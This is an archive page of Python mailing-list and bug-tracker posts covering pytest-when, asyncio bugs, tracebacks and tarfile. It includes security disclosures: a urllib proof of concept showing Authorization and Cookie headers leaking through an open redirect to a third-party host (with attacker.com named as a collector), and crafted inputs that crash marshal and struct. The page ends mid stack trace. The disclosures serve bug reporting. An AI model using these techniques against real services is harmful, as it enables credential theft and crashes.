[Python-announce] pytest-when 1.0.3
Hi all, happy to announce pytest-when 1.0.3, with a better developer experience for the `when` fixture. With pytest-when you can define complex mocking behavior via a natural interface:

```
when(some_object, "attribute").called_with(1, 2).then_return("mocked")
```

In this case some_object.attribute(1, 2) == "mocked", but if it is called with any other arguments, it will return whatever it is supposed to return.

Project GitHub: https://github.com/zhukovgreen/pytest-when (pytest plugin for more readable mocking)

Supports Python >= 3.8, tested through 3.11.

Small example from the docs:

```
# class which we're going to mock in the test
class Klass1:
    def some_method(
        self,
        arg1: str,
        arg2: int,
        *,
        kwarg1: str,
        kwarg2: str,
    ) -> str:
        return "Not mocked"


def test_should_properly_patch_calls(when):
    when(Klass1, "some_method").called_with(
        "a",
        when.markers.any,
        kwarg1="b",
        kwarg2=when.markers.any,
    ).then_return("Mocked")

    assert (
        Klass1().some_method(
            "a",
            1,
            kwarg1="b",
            kwarg2="c",
        )
        == "Mocked"
    )
    assert (
        Klass1().some_method(
            "not mocked param",
            1,
            kwarg1="b",
            kwarg2="c",
        )
        == "Not mocked"
    )


# if you need to patch a function
def test_patch_a_function(when):
    when(example_module, "some_normal_function").called_with(
        "a",
        when.markers.any,
        kwarg1="b",
        kwarg2=when.markers.any,
    ).then_return("Mocked")

    assert (
        example_module.some_normal_function(
            "a",
            1,
            kwarg1="b",
            kwarg2="c",
        )
        == "Mocked"
    )
    assert (
        example_module.some_normal_function(
            "not mocked param",
            1,
            kwarg1="b",
            kwarg2="c",
        )
        == "Not mocked"
    )
```

Thank you for any feedback

--
zhukovgreen, Data Engineer @Paylocity
https://github.com/zhukovgreen

___
Python-announce-list mailing list -- python-announce-list@python.org
To unsubscribe send an email to python-announce-list-le...@python.org
https://mail.python.org/mailman3/lists/python-announce-list.python.org/
Member address: arch...@mail-archive.com
[issue39758] StreamWriter.wait_closed() can hang indefinitely.
Artem added the comment:

Seeing this issue on 3.9.6. No SSL, just plain sockets. It seems to appear when writer.write()/writer.drain() was cancelled, and writer.close()/writer.wait_closed() are called after that.

--
nosy: +aeros, seer
versions: +Python 3.9

___
Python tracker <https://bugs.python.org/issue39758>
___
___
Python-bugs-list mailing list
Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
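A minimal, self-contained sketch of the call pattern described in the comment (hypothetical names; the local echo server and the 5-second bound are mine, added so the snippet terminates even where wait_closed() would otherwise hang):

```python
import asyncio

async def scenario():
    async def handle(reader, writer):
        # server side: read whatever arrives, then close
        await reader.read(1024)
        writer.close()

    server = await asyncio.start_server(handle, "127.0.0.1", 0)
    port = server.sockets[0].getsockname()[1]

    reader, writer = await asyncio.open_connection("127.0.0.1", port)
    writer.write(b"x" * 1024)

    # cancel an in-flight drain(), as described in the report
    drain = asyncio.ensure_future(writer.drain())
    drain.cancel()
    try:
        await drain
    except asyncio.CancelledError:
        pass

    # ... then close and wait; on affected versions this is where it hung
    writer.close()
    await asyncio.wait_for(writer.wait_closed(), timeout=5)

    server.close()
    await server.wait_closed()
    return "closed"

result = asyncio.run(scenario())
print(result)
```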
[issue38856] asyncio ProactorEventLoop: wait_closed() can raise ConnectionResetError
Artem added the comment:

Same issue with Python 3.9.6 on Linux.

--
nosy: +seer
versions: +Python 3.9

___
Python tracker <https://bugs.python.org/issue38856>
___
[issue44697] Memory leak when asyncio.open_connection raise
Artem added the comment:

Checked on 3.9.6 - still leaking. Strange, but if I write `except OSError as e: del self` instead of `except OSError as e: pass`, the leak disappears.

--
versions: +Python 3.9 -Python 3.6

___
Python tracker <https://bugs.python.org/issue44697>
___
[issue44697] Memory leak when asyncio.open_connection raise
Change by Artem :

--
nosy: +bquinlan

___
Python tracker <https://bugs.python.org/issue44697>
___
[issue44697] Memory leak when asyncio.open_connection raise
New submission from Artem :

I wrote a short example.

import resource
import asyncio


class B:
    def __init__(self, loop):
        self.loop = loop
        self.some_big_data = bytearray(1024 * 1024)  # 1Mb for memory bloating

    async def doStuff(self):
        if not await self.connect():
            return
        print('Stuff done')

    async def connect(self) -> bool:
        try:
            _, writer = await asyncio.open_connection('127.0.0.1', 12345,
                                                      loop=self.loop)
            writer.close()
            return True
        except OSError as e:
            pass
        return False


class A:
    def __init__(self, loop):
        self.loop = loop

    async def doBStuff(self):
        b = B(self.loop)
        await b.doStuff()

    async def work(self):
        print('Working...')
        for _ in range(1000):
            await self.loop.create_task(self.doBStuff())
        print('Done.')
        print(
            'Memory usage {}kb'.format(
                resource.getrusage(
                    resource.RUSAGE_SELF).ru_maxrss))


async def amain(loop):
    a = A(loop)
    await a.work()


if __name__ == "__main__":
    loop = asyncio.get_event_loop()
    loop.run_until_complete(amain(loop))

100 cycles: "Memory usage 41980kb"
1000 cycles: "Memory usage 55412kb"
10000 cycles: "Memory usage 82880kb"
And so on...

Does anyone know a workaround?

--
components: asyncio
messages: 397945
nosy: aeros, asvetlov, seer, yselivanov
priority: normal
severity: normal
status: open
title: Memory leak when asyncio.open_connection raise
type: resource usage
versions: Python 3.6

___
Python tracker <https://bugs.python.org/issue44697>
___
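The `del self` observation earlier in the thread has a plausible mechanism that can be sketched in pure Python (an illustration of CPython frame lifetimes, not a diagnosis of the asyncio internals): a saved exception's __traceback__ keeps the raising frame alive, and the frame keeps its locals, including any object carrying a large buffer.

```python
class Holder:
    """Stands in for an object carrying a large buffer (like B above)."""
    def __init__(self):
        self.some_big_data = bytearray(1024 * 1024)


def connect():
    holder = Holder()
    try:
        raise OSError("connection failed")
    except OSError as exc:
        saved = exc  # keep the exception object alive past the except block
    return saved


err = connect()
# the exception's traceback references connect()'s frame, and the frame
# still references `holder` and its megabyte of data
frame = err.__traceback__.tb_frame
print("holder" in frame.f_locals)
```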
Re: Correct traceback for multiline chain of method calling
> That line is already there:
>     # File "/home/komendart/temp/script.py", line 6, in fail
>     #     raise RuntimeError('fail')

Probably I should restate it more concretely. I have this traceback ending on Python 3.7:

# File "script.py", line 15, in main
#     .fail(True)
# File "script.py", line 6, in fail
#     raise RuntimeError('fail')

It has the exact line of the failing method's call (line 15), and that is what I want from fresh Pythons in general. Just the name of the method and the location of the error inside it in the last part of the traceback is not enough, because the method can occur in the chain several times (like .fail in my simple example), and I want the line of the exact call.

> Annoying, but it would provide the desired precision.

I agree with all parts of this sentence :) Well, I can live with such a solution, but it is really uncomfortable. In Python 3.7 and lower (even in Python 2, lol), if a method was called with some arguments, the traceback had a line corresponding to some argument of the needed call. That behaviour was suitable for me.

I can formalize my suggestion to improve Python tracebacks a bit. If we have code in one line like

(
    (some complex construction of an object with __call__)
    (
        some arguments
    )
)

the traceback should contain the line with the opening brace before the arguments. (Right now the latest Python's traceback seems to contain the start of the called object's construction.) The last line of the called object's construction, or the first line of the argument list, is fine too; it doesn't really matter to me.

BTW, it is not important to me, but I can dream about how this proposal could be generalized. For example, for failing index operations a[b] the error line should be close to the [ here, and for all binary operations (a + b fails => the error line should be close to the line with the plus operator).

Does it sound reasonable? Am I on the right mailing list for Python improvement suggestions? :)

--
Best wishes,
Artem Komendantian
komendantyan.ar...@gmail.com

Sat, 10 Jul 2021 at 02:53, Cameron Simpson:

> On 09Jul2021 18:29, Artem Komendantian wrote:
> >There is a code https://pastebin.com/0NLsHuLa.
> >It has a multiline chain of method calling, when some method fails. In
> >python3.7 it fails in a row which corresponds to the failing method, in
> >python3.9 it corresponds to the very first line.
> >
> >Another similar example is https://pastebin.com/2P9snnMn
> >The error is on the first line for older pythons too.
>
> Interesting.
>
> There was some work done in recent Pythons to improve syntax error
> reporting. I wonder if it has had side effects on the reporting.
>
> >I propose to have a line with the method name in traceback if this
> >method fails.
>
> That line is already there:
>
>     # File "/home/komendart/temp/script.py", line 6, in fail
>     #     raise RuntimeError('fail')
>
> See that it points at the fail() method from line 6 of the script?
>
> >I develop some library when it is very popular among users to declare some
> >operations with such multiline chains. Also I want to keep correct
> >traceback for each operation because the first line is not very informative
> >when some method occurred more than once in this chain.
> >
> >Can this improvement be done? Maybe anybody has any other suggestions on
> >how to get the correct line in traceback right now?
>
> Aside from putting the whole thing on 1 line? Joking.
>
> Possibly only by breaking it up purely while debugging:
>
>     x = a.do_nothing()
>     x = x.do_nothing()
>     x = x.fail(True)
>
> and so forth. Annoying, but it would provide the desired precision.
>
> Cheers,
> Cameron Simpson
> --
> https://mail.python.org/mailman/listinfo/python-list
--
https://mail.python.org/mailman/listinfo/python-list
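The pastebin examples above are elided, so here is a hypothetical stand-in for the kind of chain under discussion (class and method names mirror the quoted traceback, but are my reconstruction):

```python
import traceback


class Op:
    def do_nothing(self):
        return self

    def fail(self, really):
        if really:
            raise RuntimeError('fail')
        return self


def main():
    return (
        Op()
        .do_nothing()
        .do_nothing()
        .fail(True)  # which of these chained lines the traceback points at
                     # is exactly what the thread is about
    )


try:
    main()
except RuntimeError:
    tb = traceback.format_exc()

print("RuntimeError: fail" in tb)
```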
[issue41316] tarfile: Do not write full path in FNAME field
Artem Bulgakov added the comment:

Hi. My PR doesn't remove the ability to add a tree to a tar file. It only fixes the header for GZIP compression; any data after this header is not affected. You can test it by creating two archives with the same data, one with my patch and one without: all bytes after the header are equal.

--
___
Python tracker <https://bugs.python.org/issue41316>
___
[issue41316] tarfile: Do not write full path in FNAME field
Change by Artem Bulgakov :

--
keywords: +patch
pull_requests: +20646
stage: -> patch review
pull_request: https://github.com/python/cpython/pull/21511

___
Python tracker <https://bugs.python.org/issue41316>
___
[issue41316] tarfile: Do not write full path in FNAME field
New submission from Artem Bulgakov :

tarfile sets the FNAME field to the path given by the user: Lib/tarfile.py:424

It writes the full path instead of just the basename if the user specified an absolute path. Some archive viewer apps like 7-Zip may process the file incorrectly. It also creates a security issue, because anyone can learn the directory structure of the system, the username, or other personal information.

You can reproduce this by running the lines below in a Python interpreter. Tested on Windows and Linux.

Python 3.8.2 (default, Apr 27 2020, 15:53:34) [GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> import tarfile
>>> open("somefile.txt", "w").write("sometext")
8
>>> tar = tarfile.open("/home/bulgakovas/file.tar.gz", "w|gz")
>>> tar.add("somefile.txt")
>>> tar.close()
>>> open("file.tar.gz", "rb").read()[:50]
b'\x1f\x8b\x08\x08cE\x10_\x02\xff/home/bulgakovas/file.tar\x00\xed\xd3M\n\xc20\x10\x86\xe1\xac=EO\x90'

You can see the full path to file.tar (/home/bulgakovas/file.tar) as the FNAME field. If you write just tarfile.open("file.tar.gz", "w|gz"), FNAME will be equal to file.tar.

RFC 1952 says about FNAME:

    This is the original name of the file being compressed, with any directory components removed.

So tarfile must remove directory names from FNAME and write only the basename of the file.

--
components: Library (Lib)
messages: 373759
nosy: ArtemSBulgakov, lars.gustaebel
priority: normal
severity: normal
status: open
title: tarfile: Do not write full path in FNAME field
type: behavior
versions: Python 3.10, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9

___
Python tracker <https://bugs.python.org/issue41316>
___
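For comparison, the gzip module already follows the RFC 1952 wording by stripping directory components before writing FNAME; a small sketch of the same idea, using an in-memory buffer so it is self-contained (the path is a made-up example):

```python
import gzip
import io
import os

# what RFC 1952 asks for: FNAME with any directory components removed
path = "/home/user/data.txt"
fname = os.path.basename(path)   # 'data.txt'

buf = io.BytesIO()
with gzip.GzipFile(filename=path, mode="wb", fileobj=buf) as gz:
    gz.write(b"payload")

raw = buf.getvalue()
# gzip strips the directory part before writing the FNAME header field,
# so only the basename appears in the output
print(fname.encode() in raw, b"/home/user" in raw)
```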
[issue39013] SyntaxError: 'break' outside loop for legal Expression
Artem Tepanov added the comment:

Thanks, after upgrading to:

Python 3.8.1rc1 (tags/v3.8.1rc1:b00a2b5, Dec 10 2019, 01:13:53) [MSC v.1916 64 bit (AMD64)] on win32

all works fine. ...but could you "push the person" responsible for the web site, please? Because I got the interpreter from there:

https://www.python.org/downloads/release/python-380/

without any warning or recommendation to use 3.8.1rc1. Is that normal?

--
___
Python tracker <https://bugs.python.org/issue39013>
___
[issue39013] SyntaxError: 'break' outside loop for legal Expression
Artem Tepanov added the comment:

Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> while False:
...     if False:
...         break
...
  File "<stdin>", line 3
SyntaxError: 'break' outside loop

--
___
Python tracker <https://bugs.python.org/issue39013>
___
[issue39013] SyntaxError: 'break' outside loop for legal Expression
Artem Tepanov added the comment:

Using cmd:

C:\Users\ATepanov>python -V
Python 3.8.0

C:\Users\ATepanov>python C:\Users\ATepanov\Desktop\Outside_The_Loop.py
  File "C:\Users\ATepanov\Desktop\Outside_The_Loop.py", line 3
    break
    ^
SyntaxError: 'break' outside loop

In interactive:

Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> while False:
...     break
...
  File "<stdin>", line 2
SyntaxError: 'break' outside loop
>>>

--
___
Python tracker <https://bugs.python.org/issue39013>
___
[issue39013] SyntaxError: 'break' outside loop for legal Expression
New submission from Artem Tepanov :

Why can't I execute this code?

while False:
    if False:
        break
print('WTF?')

When I use repl.it or PyCharm at my work (Python 3.7), all works fine. Yes, I know this code looks silly, but it is a legal expression.

About the CPython interpreter:

C:\WINDOWS\system32>python
Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.

--
messages: 358175
nosy: Artem Tepanov
priority: normal
severity: normal
status: open
title: SyntaxError: 'break' outside loop for legal Expression
type: compile error
versions: Python 3.8

___
Python tracker <https://bugs.python.org/issue39013>
___
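The construct itself is easy to confirm as legal, independent of the 3.8.0 interactive-mode regression, by feeding it to compile():

```python
source = """\
while False:
    if False:
        break
print('reached')
"""

# compile() raises SyntaxError for an illegal 'break'; inside a loop body
# it is legal no matter how unreachable, so this must succeed
code = compile(source, "<snippet>", "exec")
exec(code)
```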
[issue37811] [FreeBSD, OSX] Socket module: incorrect usage of poll(2)
Change by Artem Khramov : -- components: +FreeBSD, IO, Library (Lib), macOS nosy: +ned.deily, ronaldoussoren ___ Python tracker <https://bugs.python.org/issue37811> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue37811] [FreeBSD, OSX] Socket module: incorrect usage of poll(2)
Change by Artem Khramov :

--
keywords: +patch
pull_requests: +14931
stage: -> patch review
pull_request: https://github.com/python/cpython/pull/15202

___
Python tracker <https://bugs.python.org/issue37811>
___
[issue37811] [FreeBSD, OSX] Socket module: incorrect usage of poll(2)
New submission from Artem Khramov :

The FreeBSD implementation of poll(2) restricts the timeout argument to be either zero, positive, or equal to INFTIM (-1).

Unless otherwise overridden, the socket timeout defaults to -1. This value is then converted to milliseconds (-1000) and used as the argument to the poll syscall. poll returns EINVAL (22), and the connection fails.

I discovered this bug during EINTR handling testing, and naturally found repro code in https://bugs.python.org/issue23618 (see connect_eintr.py, attached). On GNU/Linux, the example runs as expected.

--
files: connect_eintr.py
messages: 349356
nosy: akhramov
priority: normal
severity: normal
status: open
title: [FreeBSD, OSX] Socket module: incorrect usage of poll(2)
versions: Python 2.7, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9
Added file: https://bugs.python.org/file48537/connect_eintr.py

___
Python tracker <https://bugs.python.org/issue37811>
___
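A sketch of the mapping the report implies (an illustrative helper, not the socketmodule patch): a "no timeout" value must become poll's infinite-wait sentinel, never a negative millisecond count.

```python
import select
import socket

def wait_writable(sock, timeout):
    """Wait until sock is writable.

    timeout is in seconds; None or a negative value means "wait
    forever", which select.poll() expects as None (its INFTIM
    equivalent), not as a negative millisecond count.
    """
    ms = None if timeout is None or timeout < 0 else int(timeout * 1000)
    poller = select.poll()
    poller.register(sock.fileno(), select.POLLOUT)
    return bool(poller.poll(ms))

# a fresh socket pair is immediately writable
a, b = socket.socketpair()
print(wait_writable(a, 5.0))
a.close()
b.close()
```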
[issue34386] Expose a dictionary of interned strings in sys module
Artem Golubin added the comment:

Thank you, I agree. I can't come up with practical use cases other than my curiosity.

Is it possible to somehow expose the dictionary in a debug build of Python? Currently, there is no way to access it from the interpreter, even with ctypes.

--
___
Python tracker <https://bugs.python.org/issue34386>
___
[issue34386] Expose a dictionary of interned strings in sys module
New submission from Artem Golubin :

Python provides the ability to intern strings (sys.intern). It would be useful to expose a read-only dictionary of interned strings to Python users, so we can see what kinds of strings are interned. It would take minimal changes, since internally it's just a dictionary.

Is this worth adding to the sys module?

--
components: Interpreter Core
messages: 323437
nosy: rushter
priority: normal
severity: normal
status: open
title: Expose a dictionary of interned strings in sys module
type: enhancement
versions: Python 3.8

___
Python tracker <https://bugs.python.org/issue34386>
___
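For context, a small demonstration of what such a read-only view would expose: sys.intern maps equal strings to a single canonical object.

```python
import sys

# identical literals are often interned automatically by the compiler,
# so build the strings at runtime to make the effect visible
a = "".join(["inter", "ned string"])
b = "".join(["inter", "ned string"])
print(a is b)   # distinct objects before interning

a = sys.intern(a)
b = sys.intern(b)
print(a is b)   # the same canonical object afterwards
```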
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov added the comment:

If I am not missing something, section 6.4 of RFC 7231 doesn't explicitly say that all headers should be sent. I wish it did :)

I think that an Authorization header for host A may make sense for host B if both A and B use the same database of user credentials. I am not sure that modern authentication mechanisms like OAuth rely on this fact (although I need to check the specs to make sure).

Sending a Cookie header to a different domain looks like a violation of the same-origin policy to me. RFC 6265 says something about it: https://tools.ietf.org/html/rfc6265#section-5.4

curl was recently updated to filter out Authorization headers in case of a redirect to another host. Chrome and Firefox don't send either Authorization or Cookie headers while handling a redirect. It doesn't seem to be a disaster for them :)

--
___
Python tracker <https://bugs.python.org/issue33661>
___
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov <artem.smotra...@gmail.com> added the comment:

Hi Ivan,

Yes, unfortunately the specs don't say anything about this scenario.

> once you have given your credentials to a server, it is free to do whatever
> it wants with them.

I hope servers don't share this opinion :)

> So, your proposed filtering does not actually achieve anything meaningful.

I am sorry that I couldn't convince you. Thank you for your reply!

--
___
Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue33661>
___
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
New submission from Artem Smotrakov <artem.smotra...@gmail.com>:

After discussing it on secur...@python.org, it was decided to disclose it. Here is the original report:

Hello Python Security Team,

It looks like urllib may leak sensitive HTTP headers to third parties when handling redirects. Let's consider the following environment:

- http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via the basic HTTP authentication scheme
- http://httpleak.gypsyengineer.com/redirect.php?url= is an open redirect which returns a 301 code and redirects a client to the specified URL
- http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent

Let's then consider the following scenario:

- create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com'
- call the urllib.request.Request.add_header() method to set Authorization and Cookie headers
- call the urllib.request.urlopen() method to open a connection

Here is what happens next:

- urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected
- redirect.php returns a 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
- urllib processes the 301 code and makes a request to http://headers.gypsyengineer.com

The problem is that urllib sends the Authorization and Cookie headers to http://headers.gypsyengineer.com as well.

Let's imagine that a user is authenticated on a web site via one of the HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php. If an attacker can trick the user into opening http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them. As a result, the attacker can impersonate the user on the original web site.

Here is a simple POC which shows the problem:

import urllib.request

req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com')
with urllib.request.urlopen(req) as f:
    print(f.read(2048).decode("utf-8"))

Running this code results in loading http://headers.gypsyengineer.com, which prints out the Authorization and Cookie headers which were supposed to be sent only to httpleak.gypsyengineer.com:

Hello, I am headers.gypsyengineer.com
Here are HTTP headers you just sent me:
Accept-Encoding: identity
User-Agent: Python-urllib/3.8
Authorization: Basic YWRtaW46dGVzdA==
Cookie: This is only for httpleak.gypsyengineer.com
Host: headers.gypsyengineer.com
Cache-Control: max-age=259200
Connection: keep-alive

I could reproduce it with 3.5.2 and the latest build of https://github.com/python/cpython

If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.

Please let me know if I wrote anything dumb and stupid, or if you have any questions :)

Thanks!
Artem

--
components: Library (Lib)
messages: 317793
nosy: alex, artem.smotrakov
priority: normal
severity: normal
status: open
title: urllib may leak sensitive HTTP headers to a third-party web site
type: security
versions: Python 3.5

___
Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue33661>
___
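A client-side mitigation in the spirit of the proposed filtering can be sketched with a custom redirect handler (a sketch, not the in-urllib fix the report asks for; the strip-on-host-change policy and the handler name are my assumptions):

```python
import urllib.request
from urllib.parse import urlsplit

SENSITIVE = ("Authorization", "Cookie")

class StrippingRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Drop credential headers when a redirect leaves the original host."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        new = super().redirect_request(req, fp, code, msg, headers, newurl)
        if new is not None:
            old_host = urlsplit(req.full_url).hostname
            new_host = urlsplit(new.full_url).hostname
            if old_host != new_host:
                for name in SENSITIVE:
                    new.remove_header(name)
        return new

# the handler would be installed like this:
# opener = urllib.request.build_opener(StrippingRedirectHandler)
# opener.open(req)
```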
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
Changes by Artem Smotrakov <artem.smotra...@gmail.com>:

--
keywords: +patch
Added file: http://bugs.python.org/file46723/_struct_cache.patch

___
Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue29802>
___
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
New submission from Artem Smotrakov:

The attached struct_unpack_crash.py results in a null-pointer dereference in the s_unpack_internal() function of the _struct module:

ASAN:SIGSEGV
==20245==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x7facd2cea83a bp 0x sp 0x7ffd0250f860 T0)
    #0 0x7facd2cea839 in s_unpack_internal /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515
    #1 0x7facd2ceab69 in Struct_unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1570
    #2 0x7facd2ceab69 in unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:2192
    #3 0x7facd2ceab69 in unpack /home/artem/projects/python/src/cpython-asan/Modules/clinic/_struct.c.h:215
    #4 0x474397 in _PyMethodDef_RawFastCallKeywords Objects/call.c:618
    #5 0x474397 in _PyCFunction_FastCallKeywords Objects/call.c:690
    #6 0x42685f in call_function Python/ceval.c:4817
    #7 0x42685f in _PyEval_EvalFrameDefault Python/ceval.c:3298
    #8 0x54b164 in PyEval_EvalFrameEx Python/ceval.c:663
    #9 0x54b164 in _PyEval_EvalCodeWithName Python/ceval.c:4173
    #10 0x54b252 in PyEval_EvalCodeEx Python/ceval.c:4200
    #11 0x54b252 in PyEval_EvalCode Python/ceval.c:640
    #12 0x431e0e in run_mod Python/pythonrun.c:976
    #13 0x431e0e in PyRun_FileExFlags Python/pythonrun.c:929
    #14 0x43203b in PyRun_SimpleFileExFlags Python/pythonrun.c:392
    #15 0x446354 in run_file Modules/main.c:338
    #16 0x446354 in Py_Main Modules/main.c:809
    #17 0x41df71 in main Programs/python.c:69
    #18 0x7facd58ac82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #19 0x428728 in _start (/home/artem/projects/python/build/cpython-asan/bin/python3.7+0x428728)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515 s_unpack_internal
==20245==ABORTING

It looks like the _struct implementation assumes that PyStructObject->s_codes cannot be null, but that may happen if a bytearray was passed to unpack(). PyStructObject->s_codes becomes null in a couple of places in _struct.c, but that's not the case here. unpack() calls _PyArg_ParseStack() with cache_struct_converter(), which maintains a cache. Even if unpack() was called incorrectly with a string as the second parameter (see below), this value is going to be cached anyway. The next time the same format string is used, the value is retrieved from the cache. But PyStructObject->s_codes is still not null in the cache_struct_converter() function.

If you watch "s_object" under gdb, you can see that "s_codes" becomes null here:

PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647
647         view->format = NULL;
(gdb) bt
#0  PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647
#1  0x0046020c in bytearray_getbuffer (obj=0x77e50730, view=, flags=) at Objects/bytearrayobject.c:72
#2  0x00560b0a in getbuffer (errmsg=, view=0x7fffd700, arg=0x77e50730) at Python/getargs.c:1380
#3  convertsimple (freelist=0x7fffd3b0, bufsize=256, msgbuf=0x7fffd4c0 "must be bytes-like object, not str", flags=2, p_va=0x0, p_format=, arg=0x77e50730) at Python/getargs.c:938
#4  convertitem (arg=0x77e50730, p_format=p_format@entry=0x7fffd3a8, p_va=p_va@entry=0x7fffd610, flags=flags@entry=2, levels=levels@entry=0x7fffd3c0, msgbuf=msgbuf@entry=0x7fffd4c0 "must be bytes-like object, not str", bufsize=256, freelist=0x7fffd3b0) at Python/getargs.c:596
#5  0x00561d6f in vgetargs1_impl (compat_args=compat_args@entry=0x0, stack=stack@entry=0x6164b520, nargs=2, format=format@entry=0x735d5c88 "O*:unpack", p_va=p_va@entry=0x7fffd610, flags=flags@entry=2) at Python/getargs.c:388
#6  0x005639b0 in _PyArg_ParseStack_SizeT (args=args@entry=0x6164b520, nargs=, format=format@entry=0x735d5c88 "O*:unpack") at Python/getargs.c:163
#7  0x735d2df8 in unpack (module=module@entry=0x77e523b8, args=args@entry=0x6164b520, nargs=, kwnames=kwnames@en
[issue29598] Write unit tests for pdb module
New submission from Artem Muterko:

I want to write unit tests for the pdb module of the stdlib. Should I create one pull request for the entire module, or should I split the work into several pull requests?

--
___
Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue29598>
___
[issue29598] Write unit tests for pdb module
Changes by Artem Muterko <arti...@gmail.com>:

--
components: Tests
nosy: Artem Muterko
priority: normal
severity: normal
status: open
title: Write unit tests for pdb module
versions: Python 3.7

___
Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue29598>
___
[issue27826] Null-pointer dereference in tuplehash() function
Changes by Artem Smotrakov <artem.smotra...@gmail.com>:

--
keywords: +patch
Added file: http://bugs.python.org/file44184/tuplehash.patch

___
Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue27826>
___
[issue27826] Null-pointer dereference in tuplehash() function
New submission from Artem Smotrakov: A null-pointer dereference may happen while deserialization incorrect data with marshal.loads() function. Here is a test which reproduces this (see also attached marshal_tuplehash_null_dereference.py): import marshal value = ( # tuple1 "this is a string", #string1 [ 1, # int1 2, # int2 3, # int3 4 # int4 ], ( #tuple2 "more tuples", #string2 1.0,# float1 2.3,# float2 4.5 # float3 ), "this is yet another string" ) dump = marshal.dumps(value) data = bytearray(dump) data[10] = 40 data[4] = 16 data[103] = 143 data[97] = 245 data[78] = 114 data[35] = 188 marshal.loads(bytes(data)) This code modifies the serialized data with the following: - update type of 'int2' element to TYPE_SET, 'int3' element becomes a length of the set - update 'float3' element to TYPE_REF which points to tuple1 Here is a stack trace reported by ASan: ASAN:SIGSEGV = ==20296==ERROR: AddressSanitizer: SEGV on unknown address 0x0008 (pc 0x00582064 bp 0x7ffc9e581310 sp 0x7ffc9e5812f0 T0) #0 0x582063 in PyObject_Hash Objects/object.c:769 #1 0x5a3662 in tuplehash Objects/tupleobject.c:358 #2 0x5820ae in PyObject_Hash Objects/object.c:771 #3 0x5a3662 in tuplehash Objects/tupleobject.c:358 #4 0x5820ae in PyObject_Hash Objects/object.c:771 #5 0x58fac8 in set_add_key Objects/setobject.c:422 #6 0x59a85c in PySet_Add Objects/setobject.c:2323 #7 0x760d9d in r_object Python/marshal.c:1310 #8 0x76029d in r_object Python/marshal.c:1223 #9 0x760015 in r_object Python/marshal.c:1195 #10 0x7621dc in read_object Python/marshal.c:1465 #11 0x7639be in marshal_loads Python/marshal.c:1767 #12 0x577ff3 in PyCFunction_Call Objects/methodobject.c:109 #13 0x708a05 in call_function Python/ceval.c:4744 #14 0x6fb5a7 in PyEval_EvalFrameEx Python/ceval.c:3256 #15 0x70276f in _PyEval_EvalCodeWithName Python/ceval.c:4050 #16 0x70299f in PyEval_EvalCodeEx Python/ceval.c:4071 #17 0x6e07d7 in PyEval_EvalCode Python/ceval.c:778 #18 0x432354 in run_mod Python/pythonrun.c:980 #19 0x431e5b in 
